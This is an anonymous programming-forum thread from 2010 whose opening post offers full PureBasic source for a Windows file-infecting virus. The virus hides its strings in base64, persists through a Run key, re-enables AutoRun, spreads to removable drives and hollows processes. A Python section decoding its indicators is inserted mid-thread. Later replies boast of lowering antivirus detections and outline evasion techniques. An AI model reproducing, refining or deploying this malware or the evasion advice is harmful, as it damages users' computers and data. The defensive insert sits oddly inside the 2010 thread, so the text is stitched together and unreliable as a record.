
Win32.Stream remake

Name: Anonymous 2010-03-24 9:47

Yes, my lovely /prog/ - I got utterly bored again. This time you receive my variant of the infamous NTFS-abusing virus. Rate it, colleagues:

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-
; Win32.Flinch v0.9 (Beta)
; Developed in 2010 by Alicia.
; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-

EnableExplicit
#PSection = "fip+UFJJTUVfREFUQX4qfg=="
#Section = "OkZsaW5jaGVk"
#Resident = "bnRsZHIuZXhl"
#RegRunBranch = "U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu"
#RegDriveBranch = "U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUG9saWNpZXNcRXhwbG9yZXJc"
#SIMark = "Kl9GbGluY0hfKl9GbGluY0hfKg=="
#NTDLL = "bnRkbGwuZGxs"
#K32DLL = "S2VybmVsMzIuZGxs"
#UnMapper = "WndVbm1hcFZpZXdPZlNlY3Rpb24="
#WPMemory = "V3JpdGVQcm9jZXNzTWVtb3J5"
#RPMemory = "UmVhZFByb2Nlc3NNZW1vcnk="
#ARunFile = "OlxXaW5OVC5jb20="
#LibLoad = #DONT_RESOLVE_DLL_REFERENCES | #LOAD_LIBRARY_AS_DATAFILE
#HiddenSystem = #PB_FileSystem_Hidden | #PB_FileSystem_System
#MegaByte = 1024 * 1024
#CrunchDelay = 45
#FirstDrive = 'C'
Define Letter.c, DType, TPath.s{#MAX_PATH}, MyName.S = ProgramFilename()
Global *WaitingMutex = CreateMutex()
Global MySize, Size2, *MyBody, CRC32
Global Dim Drives.a('Z'-#FirstDrive-1)
Declare IsARunner(Path.s)
Declare CrunchDrive(Letter.i)
Declare.S Decode64(String.S)
Declare RegSetStr(hKey, SubKey.S, ValueName.S, Dat.S)
Declare RegSetInt(hKey, SubKey.S, ValueName.S, Dat.I)
Declare RunPE(PName.S, lBuff, parameters.s)
Declare.s TempFileName()
Declare InfuseData(EXE.s, *DataPtr, DataSize, DataName.s)
Declare ExfuseData(*Module, DataName.s)
Declare CopyResources(SrcModule.s, DestModule.s)
; Hiding suspicious function calls (resolved at run time from base64-encoded names).
Prototype UnmapSectionPT(*ProcessHandle, *BaseAdress)
Prototype WriteProcessPT(*ProcessHandle, *BaseAdress, *Buffer, Size.l, *BytesWritten)
Prototype ReadProcessPT(*ProcessHandle, *BaseAdress, *Buffer, Size.l, *BytesReaded)
Global UnmapSection_.UnmapSectionPT=GetProcAddress_(GetModuleHandle_(Decode64(#NTDLL)),Decode64(#UnMapper))
Global WriteProcess_.WriteProcessPT=GetProcAddress_(GetModuleHandle_(Decode64(#K32DLL)),Decode64(#WPMemory))
Global ReadProcess_.ReadProcessPT=GetProcAddress_(GetModuleHandle_(Decode64(#K32DLL)),Decode64(#RPMemory))
; Some macros:
Macro SetRegSettings()
RegSetStr(#HKEY_LOCAL_MACHINE, Decode64(#RegRunBranch), Decode64("TlQ0IGhvc3Rpbmcgc2VydmljZQ=="), MyName)
RegSetInt(#HKEY_LOCAL_MACHINE, Decode64(#RegDriveBranch), Decode64("Tm9Ecml2ZUF1dG9SdW4="), 0)
RegSetInt(#HKEY_LOCAL_MACHINE, Decode64(#RegDriveBranch), Decode64("Tm9Ecml2ZVR5cGVBdXRvUnVu"), 0)
EndMacro
; Resident's path retrieving.
GetSystemDirectory_(@TPath, #MAX_PATH)
If Right(TPath, 1) <> "\" : TPath + "\" : EndIf
TPath + Decode64(#Resident)
SetRegSettings()
; Main choice...
If UCase(MyName) = UCase(TPath)
; -Resident behavior-
; Checking for second execution.
If CreateSemaphore_(0, 0, 1, Decode64(#SIMark)) And GetLastError_() = #ERROR_ALREADY_EXISTS : End : EndIf
; Body retrieving.
MySize = FileSize(MyName)
*MyBody = AllocateMemory(MySize)
ReadFile(0, MyName)
ReadData(0, *MyBody, MySize)
CloseFile(0)
; Machine name's CRC32 retrieving...
TPath = Space(#MAX_COMPUTERNAME_LENGTH)
DType = #MAX_COMPUTERNAME_LENGTH
GetComputerName_(@TPath, @DType)
CRC32 = CRC32Fingerprint(@TPath, DType)
; ---------------------
; Drives loop.
TPath = Decode64("Kjpc")
Repeat : SetRegSettings(); Infinite loop
For Letter = #FirstDrive To 'Z' : PokeC(@TPath, Letter)
DType = GetDriveType_(@TPath); Retrieving type of drive.
If DType => #DRIVE_REMOVABLE And DType <= #DRIVE_RAMDISK And DType <> #DRIVE_CDROM
; Testing if drive is already being crunched.
If Drives(Letter - #FirstDrive) = #False
Drives(Letter - #FirstDrive) = #True
CreateThread(@CrunchDrive(), Letter)
EndIf
EndIf
Next Letter
Delay(15 * 1000); Light pause for better mood.
ForEver
; ---------------------
Else
; -Agent behavior-
SetFileAttributes(TPath, #PB_FileSystem_Normal)
If CreateFile(1, TPath); If resident isn't already executed...
; Preparing body for transfer.
*MyBody = ExfuseData(#Null, Decode64(#PSection))
If *MyBody = #Null : ReadFile(0, MyName); If no prime found...
MySize = Lof(0) : *MyBody = AllocateMemory(MySize)
ReadData(0, *MyBody, MySize)
CloseFile(0)
Else : MySize = MemorySize(*MyBody)
EndIf
; Transferring body.
WriteData(1, *MyBody, MySize) : CloseFile(1)
EndUpdateResource_(BeginUpdateResource_(@TPath, #True), #False); Do not pack with UPX!
RunProgram(TPath)
FreeMemory(*MyBody)
EndIf; Now hiding it for sure:
SetFileAttributes(TPath, #HiddenSystem)
TPath = Decode64(#ARunfile)
; Original program's execution.
If IsARunner(MyName) = #False; If it isn't autorunner...
If ReadFile(0, MyName + Decode64(#Section)); Header
ReadFile(1, MyName); Main body - our code.
MySize = Lof(1) : *MyBody = AllocateMemory(MySize)
Size2 = Lof(0)  : ReadData(0, *MyBody, Size2)
FileSeek(1, Size2); Rewinding to read body
ReadData(1, *MyBody + Size2, MySize - Size2)
CloseFile(1)
CloseFile(0)
TPath = PeekS(GetCommandLine_())
RunPE(MyName, *MyBody, Right(TPath, Len(TPath) - Len(MyName) - 3))
Else : ! MOV EAX, [0]; Imitate error.
EndIf
; Imitate opening of drive in Explorer.
Else : RunProgram(Decode64("ZXhwbG9yZXIuZXhl"), Left(MyName, 3), "")
EndIf
EndIf
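
The base64 string table at the top of the post and the host-reconstruction step in the agent branch (ADS header + remainder of the main stream), worked through as an added analysis example. This is not code from the original post and not the sample's own logic; it is what a responder would write to see what the constants actually say and to undo the on-disk layout the agent branch reads back. Assumptions: the decoded strings are taken literally from the posted constants; `system_dir` is a placeholder for what `GetSystemDirectory()` would return; the infection layout (virus body overwrites the host's first `Lof(":Flinched")` bytes, original head saved in that stream) is inferred from the read-back code since `CrunchDrive()` is not in the post; the sample bytes in `build_infected_sample()` are constructed, not a real sample.

```python
import base64

# String table copied from the posted PureBasic constants (plus the literals
# used inline in SetRegSettings(), the drives loop and the agent branch).
# The sample keeps every telling string base64-encoded so a naive strings(1)
# pass shows nothing useful.
OBFUSCATED = {
    "PSection":           "fip+UFJJTUVfREFUQX4qfg==",
    "Section":            "OkZsaW5jaGVk",
    "Resident":           "bnRsZHIuZXhl",
    "RegRunBranch":       "U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu",
    "RegDriveBranch":     "U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUG9saWNpZXNcRXhwbG9yZXJc",
    "SIMark":             "Kl9GbGluY0hfKl9GbGluY0hfKg==",
    "NTDLL":              "bnRkbGwuZGxs",
    "K32DLL":             "S2VybmVsMzIuZGxs",
    "UnMapper":           "WndVbm1hcFZpZXdPZlNlY3Rpb24=",
    "WPMemory":           "V3JpdGVQcm9jZXNzTWVtb3J5",
    "RPMemory":           "UmVhZFByb2Nlc3NNZW1vcnk=",
    "ARunFile":           "OlxXaW5OVC5jb20=",
    "RunValueName":       "TlQ0IGhvc3Rpbmcgc2VydmljZQ==",   # literal in SetRegSettings()
    "NoDriveAutoRun":     "Tm9Ecml2ZUF1dG9SdW4=",           # literal in SetRegSettings()
    "NoDriveTypeAutoRun": "Tm9Ecml2ZVR5cGVBdXRvUnVu",       # literal in SetRegSettings()
    "DriveMask":          "Kjpc",                           # literal in the drives loop
    "Explorer":           "ZXhwbG9yZXIuZXhl",               # literal in the agent branch
}


def decode_table(table=OBFUSCATED):
    """Decode every constant; the sample's Decode64() does the same at run time."""
    return {name: base64.b64decode(b64).decode("ascii") for name, b64 in table.items()}


def indicators(system_dir=r"C:\Windows\system32"):
    """Host artefacts the posted source says the sample creates.
    system_dir is an assumed value; the sample uses GetSystemDirectory()."""
    s = decode_table()
    return {
        "resident_path": system_dir.rstrip("\\") + "\\" + s["Resident"],
        "run_key": "HKLM\\" + s["RegRunBranch"],
        "run_value_name": s["RunValueName"],
        "policy_key": "HKLM\\" + s["RegDriveBranch"].rstrip("\\"),
        # The sample writes 0 to both values, re-enabling AutoRun for every
        # drive class; the hardened setting is NoDriveTypeAutoRun = 0xFF.
        "policy_values_set_to_zero": [s["NoDriveAutoRun"], s["NoDriveTypeAutoRun"]],
        "hardened_NoDriveTypeAutoRun": 0xFF,
        "removable_drive_dropper": "<drive>" + s["ARunFile"],
        "host_ads_name": s["Section"],
        "resource_with_clean_body": s["PSection"],
        "single_instance_semaphore": s["SIMark"],
        "resolved_at_runtime": [s["UnMapper"], s["WPMemory"], s["RPMemory"]],
    }


def reconstruct_host(infected_image: bytes, flinched_stream: bytes) -> bytes:
    """Reverse the on-disk layout the agent branch reads back at start-up:
    Size2 = Lof(':Flinched') bytes come from the ADS, the rest of the host
    follows the virus body in the main stream (FileSeek(1, Size2))."""
    size2 = len(flinched_stream)
    if size2 == 0 or size2 > len(infected_image):
        raise ValueError("ADS length inconsistent with infected image")
    return flinched_stream + infected_image[size2:]


def build_infected_sample():
    """Constructed test data, not a real sample: a toy host and a toy virus
    body laid out the way the agent branch expects to find them."""
    host = b"MZ" + bytes(range(256)) * 4          # 1026-byte fake host
    virus = b"VIRUS" * 40                         # 200-byte fake virus body
    infected = virus + host[len(virus):]          # body overwrites the host head
    stream = host[:len(virus)]                    # original head lives in host:Flinched
    return host, infected, stream


if __name__ == "__main__":
    for name, value in indicators().items():
        print(f"{name:32} {value}")
    host, infected, stream = build_infected_sample()
    print("host restored:", reconstruct_host(infected, stream) == host)
```

On a live Windows box the `indicators()` output maps directly onto what to check: the Run value under HKLM, the two Policies\Explorer values (anything other than 0xFF for NoDriveTypeAutoRun is worth a look), the fake `ntldr.exe` in the system directory, and `WinNT.com` in the root of removable drives. Files carrying a `:Flinched` stream are candidate hosts, and `reconstruct_host()` is the recovery step for them.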

Name: Anonymous 2010-03-25 18:52

>>40
You're FUNNY!

Name: Anonymous 2010-03-25 20:17

Name: Anonymous 2010-03-25 20:51

>>41

What about his funny?

Name: Anonymous 2010-03-26 4:42

Just in case someone didn't notice: the link in >>9 is still valid.

Name: Anonymous 2010-03-26 5:44

>>44
what is it?

Name: Anonymous 2010-03-26 5:58

>>45
the url says "2-ch". so obviously, it's porn.

Name: Anonymous 2010-03-26 6:31

>>9
I really enjoy the improvisational piece very much, reminds me of Kandinsky. You have truly captured the process of your creation, and the tools you used clearly mated with the canvas quite well. It is pleasing to the eye. Your creation's context could possibly derive from the birth of the electronic keyboard in 1980's music, yet at the same time I'm reminded of the deep emotions seeded in a personal relationship between a boy and his first imaginary friend. The environment you grew up in has surely been reflected in this masterpiece.

Name: Anonymous 2010-03-26 6:35

>>47
Nice try, but no.

Name: Anonymous 2010-03-26 6:54

http://i39.tinypic.com/2yopn4n.jpg

Now valid forever[1]

[1] Well, maybe not forever, but certainly will outlive the link that >>9 provided

Name: Anonymous 2010-03-27 3:44

Just compiled it: around 8 detections. Not too bad for non-crypted code, but it still needs some stealth.

Name: Anonymous 2010-03-27 4:47

>>50

Um, VirusTotal? If so, I already managed to reduce the number of detections to 6 in the latest revision. Still needs some more work, however...

Name: Anonymous 2010-03-27 8:21

Awesome: just upgraded the autorun functionality by adding a command for deletion of the 'autorun.inf' directory. -1 positive on VirusTotal.

Name: Anonymous 2010-03-27 10:17

>>50-52
You do know there are fairly foolproof methods of having near-perfect (it's impossible to get 100% clean now that Symantec just flags every file it has never seen before as suspicious, which I find very offensive to those that actually don't produce malware but have all their new updates flagged by their silly popularity-based detection) detection rates on VirusTotal? Such methods involve heavy metamorphic transforms of the loader, manual API resolving (by hash), and calling the kernel directly (find out SSDT offsets/IDs by loading up ntdll and resolving from there). Current AVs suck balls (and will likely continue to do so for a while) at dealing with such things. I'd be surprised if any manage to detect anything if they function in userland only (and since MS added PatchGuard, they can't do ring0 hooks to properly monitor things). Of course, those that run the file sandboxed and have a ring0 driver which can intercept the calls (PatchGuard disabled, or just run on XP or similar) will be able to use heuristics to find out if you're doing anything bad.

Name: Anonymous 2010-03-27 10:27

>>53
This is the greatest amount of bullshit in a single paragraph I've seen this week.

Name: Anonymous 2010-03-27 11:23

>>1

Please re-write this in a readable language like C.

Name: Anonymous 2010-03-27 11:57

>>54
Oh really? I'd like to see you prove me wrong.

I've yet to see AVs which can properly handle morphed/VMed malware. Most of them are signature based, and the rest either have some primitive emulation or some active hook-based heuristics.

How do you propose an AV would catch some malware which just uses sysenter/int2F to do syscalls if they don't have a kernel driver which intercepts those calls (keep in mind, Microsoft prevented SSDT hooking as a legitimate method for AV vendors by implementing PatchGuard)?

Provide some proof for your words >>54, or IHBT.

Name: not >>54 2010-03-28 3:06

I agree with >>56 in essence.
>>53 was not very well written though.
